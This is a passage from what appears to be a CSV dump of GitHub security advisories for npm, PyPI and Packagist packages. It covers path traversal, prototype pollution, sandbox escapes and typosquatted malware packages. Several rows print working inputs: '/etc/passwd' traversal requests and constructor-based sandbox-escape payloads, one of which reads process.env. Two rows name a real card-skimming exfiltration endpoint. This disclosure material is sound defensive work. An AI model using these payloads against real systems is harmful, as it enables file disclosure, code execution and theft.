+Upgrade to version 0.6.1 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-git-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gabrielcsapo/node-git-server/pull/62'}, {'type': 'WEB', 'url': 'https://github.com/gabrielcsapo/node-git-server/commit/ac26650f69bc445d71e4f2c55328676d10a4be43'}, {'type': 'PACKAGE', 'url': 'https://github.com/gabrielcsapo/node-git-server'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEGITSERVER-474343'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1214'}]","{'cwe_ids': ['CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8xj3-7258-w4q2,2023-09-11T20:32:32Z,2020-09-01T18:51:22Z,,['CVE-2017-16179'],Directory Traversal in dasafio,"Affected versions of `dasafio` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dasafio'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16179'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dasafio'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/460'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rvww-x6m4-4vc2,2021-09-30T22:00:23Z,2020-09-11T21:12:39Z,,[],Malicious Package in blubird,"Version 3.5.0 of `blubird` contains malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.
+
+
+## Recommendation
+
+Remove the package from your environment and verify whether your system is running the cryptocurrency miner.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'blubird'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/921'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-22q9-hqm5-mhmc,2021-09-28T17:01:08Z,2020-09-11T21:22:24Z,,[],Cross-Site Scripting in swagger-ui,"Versions of `swagger-ui` prior to 2.2.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to encode output in GET requests. The request is meant to respond with Content-Type `application/json` which does not trigger the vulnerability but if the web server changes the header to `text/html` it may allow attackers to execute arbitrary JavaScript.
+
+
+## Recommendation
+
+Upgrade to version 2.2.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/1154'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/987'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-52c9-458g-whrf,2021-09-30T17:00:43Z,2020-09-03T22:58:17Z,,[],Malicious Package in js-3ha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-3ha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1280'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p2cq-cprg-frvm,2021-08-26T15:20:06Z,2020-09-25T18:28:56Z,,['CVE-2020-15214'],Out of bounds write in tensorflow-lite,"### Impact
+In TensorFlow Lite models using segment sum can trigger a write out bounds / segmentation fault if the segment ids are not sorted. Code assumes that the segment ids are in increasing order, using the last element of the tensor holding them to determine the dimensionality of output tensor:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L44
+
+This results in allocating insufficient memory for the output tensor and in a write outside the bounds of the output array:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reference_ops.h#L2625-L2631
+
+This usually results in a segmentation fault, but depending on runtime conditions it can provide for a write gadget to be used in future memory corruption-based exploits.
+
+### Patches
+We have patched the issue in 204945b and will release patch releases for all affected versions.
+
+We recommend users to upgrade to TensorFlow 2.2.1, or 2.3.1.
+
+### Workarounds
+A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that the segment ids are sorted, although this only handles the case when the segment ids are stored statically in the model.
+
+A similar validation could be done if the segment ids are generated at runtime between inference steps.
+
+If the segment ids are generated as outputs of a tensor during inference steps, then there are no possible workaround and users are advised to upgrade to patched code.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p2cq-cprg-frvm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15214'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/204945b19e44b57906c9344c0d00120eeeae178a'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T18:25:05Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-ff6g-gm92-rf32,2021-10-01T20:58:19Z,2020-09-03T19:42:06Z,,[],Malicious Package in coinstirng,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'coinstirng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1383'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8rxg-9g6f-vq9p,2021-09-24T16:18:50Z,2020-09-01T19:46:01Z,,[],Malicious Package in another-date-range-picker,"Version 4.1.48 of `another-date-range-picker` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+## Recommendation
+
+If version 4.1.48 of this module is found installed you will want to replace it with a version before or after 4.1.48. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/'}]","[{'package': {'ecosystem': 'npm', 'name': 'another-date-range-picker'}, 'versions': ['4.1.48']}]","[{'type': 'WEB', 'url': 'https://github.com/bi-a/mydaterangepicker'}, {'type': 'PACKAGE', 'url': 'https://github.com/kekeh/mydaterangepicker'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ANOTHERDATERANGEPICKER-451011'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/617'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-56r9-v65c-34jm,2023-07-13T21:05:58Z,2020-09-03T02:33:37Z,,[],Malicious Package in radicjs,"Version 0.2.1 of `radicjs` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised. Users may downgrade to 0.2.0",[],"[{'package': {'ecosystem': 'npm', 'name': 'radicjs'}, 'versions': ['0.2.1']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/943'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-83pq-466j-fc6j,2020-08-31T18:55:34Z,2020-09-04T15:17:50Z,,[],Prototype Pollution in sahmat,"All versions of `sahmat ` are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'sahmat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1336'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fpw3-x4xq-6vxq,2021-10-01T13:46:23Z,2020-09-02T18:32:13Z,,[],Malicious Package in wepack-cli,"All versions of `wepack-cli` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wepack-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/839'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rmmc-8cqj-hfp3,2020-08-31T18:46:51Z,2020-09-03T18:24:43Z,,[],Authentication Bypass in otpauth,"Versions of `otpauth` prior to 3.2.8 are vulnerable to Authentication Bypass. The package's `totp.validate()` function may return positive values for single digit tokens even if they are invalid. This may allow attackers to bypass the OTP authentication by providing single digit tokens.
+
+
+## Recommendation
+
+Upgrade to version 3.2.8 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'otpauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.8'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1087'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7x92-2j68-h32c,2020-08-31T18:27:38Z,2020-09-01T19:03:02Z,,[],Directory Traversal in featurebook,"Affected versions of `featurebook` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+The `featurebook` package is not intended to be run in production code nor to be exposed to an untrusted network.
+
+
+## Proof of Concept
+```
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No direct patch is currently available.
+
+At this time, the best mitigation is to ensure that `featurebook` is not running in production or exposed to an untrusted network.",[],"[{'package': {'ecosystem': 'npm', 'name': 'featurebook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/296305'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/556'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:27:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rrvm-gqq8-q2wx,2021-09-29T20:45:41Z,2020-09-03T21:05:26Z,,[],Malicious Package in require-port,"Version 1.0.0 of `require-port` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'require-port'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1197'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xgp2-cc4r-7vf6,2020-08-31T18:50:28Z,2020-09-03T20:44:21Z,,[],Denial of Service in http-live-simulator,"Versions of `http-live-simulator` prior to 1.0.8 are vulnerable to Denial of Service. The package fails to catch an exception that causes the Node process to crash, effectively shutting down the server. This allows an attacker to send an HTTP request that crashes the server.
+
+
+## Recommendation
+
+Upgrade to version 1.0.8 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'http-live-simulator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.8'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/627376'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1189'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qccf-q7p4-3q3j,2020-08-31T18:55:32Z,2020-09-04T15:16:42Z,,[],Prototype Pollution in safe-object2,"All versions of `safe-object2` are vulnerable to prototype pollution. The `settter()` function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'safe-object2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1335'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3gpc-w23c-w59w,2021-04-21T19:45:42Z,2020-09-04T15:02:06Z,,[],Sandbox Breakout / Arbitrary Code Execution in pitboss-ng,"All versions of `pitboss-ng` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'pitboss-ng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1319'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-255r-pghp-r5wh,2021-10-01T21:02:17Z,2020-09-03T17:05:34Z,,[],Malicious Package in hdeky,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'hdeky'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1398'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hj5w-xgw9-w4rj,2021-10-01T20:58:49Z,2020-09-03T19:41:44Z,,[],Malicious Package in coinstrng,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'coinstrng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1385'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g376-whg7-896m,2020-08-31T18:23:39Z,2020-09-01T18:45:53Z,,[],Directory Traversal in yjmyjmyjm,"Affected versions of `yjmyjmyjm` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+Example request:
+```
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'yjmyjmyjm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yjmyjmyjm'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/451'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g5m5-v5cp-5p7m,2023-09-11T23:15:25Z,2020-09-01T18:50:16Z,,['CVE-2017-16181'],Directory Traversal in wintiwebdev,"Affected versions of `wintiwebdev` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wintiwebdev'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16181'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/wintiwebdev'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/458'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8h8v-6qqm-fwpq,2020-08-31T18:32:22Z,2020-09-01T21:06:38Z,,[],Path Traversal in express-cart,"Versions of `express-cart` before 1.1.7 are vulnerable to Path Traversal.
+
+
+## Recommendation
+
+Update to version 1.1.7 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'express-cart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.5'}}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/343726'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/676'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-992f-wf4w-x36v,2020-08-31T18:33:09Z,2020-09-01T21:16:13Z,,[],Prototype Pollution in merge-objects,"All versions of `merge-objects` are vulnerable to Prototype Pollution.
+
+
+## Recommendation
+
+No fix is available for this vulnerability at this time. It is our recommendation to use an alternative package.",[],"[{'package': {'ecosystem': 'npm', 'name': 'merge-objects'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/310706'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/716'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:33:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rm7c-x424-g2mw,2021-10-01T13:47:19Z,2020-09-02T18:36:31Z,,[],Malicious Package in asyync,"All versions of `asyync` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asyync'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/843'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fm4j-4xhm-xpwx,2020-08-31T18:34:58Z,2020-09-02T15:51:34Z,,[],Sandbox Breakout / Arbitrary Code Execution in sandbox,"All versions of `sandbox` are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.
+
+## Proof of concept
+```
+var Sandbox = require(""sandbox"")
+s = new Sandbox()
+code = `new Function(""return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())"")()(""util"").inspect(""hi"")`
+s.run(code)
+```
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'sandbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gf3/sandbox/issues/50'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/766'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-699q-wcff-g9mj,2021-01-07T22:56:34Z,2020-09-15T18:19:56Z,,['CVE-2020-15148'],Unsafe deserialization in Yii 2,"### Impact
+
+Remote code execution in case application calls `unserialize()` on user input containing specially crafted string.
+
+### Patches
+
+2.0.38
+
+### Workarounds
+
+Add the following to BatchQueryResult.php:
+
+```php
+public function __sleep()
+{
+ throw new \BadMethodCallException('Cannot serialize '.__CLASS__);
+}
+
+public function __wakeup()
+{
+ throw new \BadMethodCallException('Cannot unserialize '.__CLASS__);
+}
+```
+
+### For more information
+
+If you have any questions or comments about this advisory, [contact us through security form](https://www.yiiframework.com/security).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yiisoft/yii2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.38'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15148'}, {'type': 'WEB', 'url': 'https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-15T18:19:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m8pw-hgvj-cwcm,2023-09-11T20:34:10Z,2020-09-01T18:08:55Z,,['CVE-2017-16215'],Directory Traversal in sgqserve,"Affected versions of `sgqserve` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sgqserve'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16215'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/sgqserve'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/419'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c6pw-q7f2-97hv,2021-06-15T17:25:24Z,2020-09-04T17:57:43Z,,['CVE-2019-0219'],Privilege Escalation in cordova-plugin-inappbrowser,"Versions of `cordova-plugin-inappbrowser` prior to 3.1.0 are vulnerable to Privilege Escalation. A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI. This affects Cordova Android applications using the package.
+
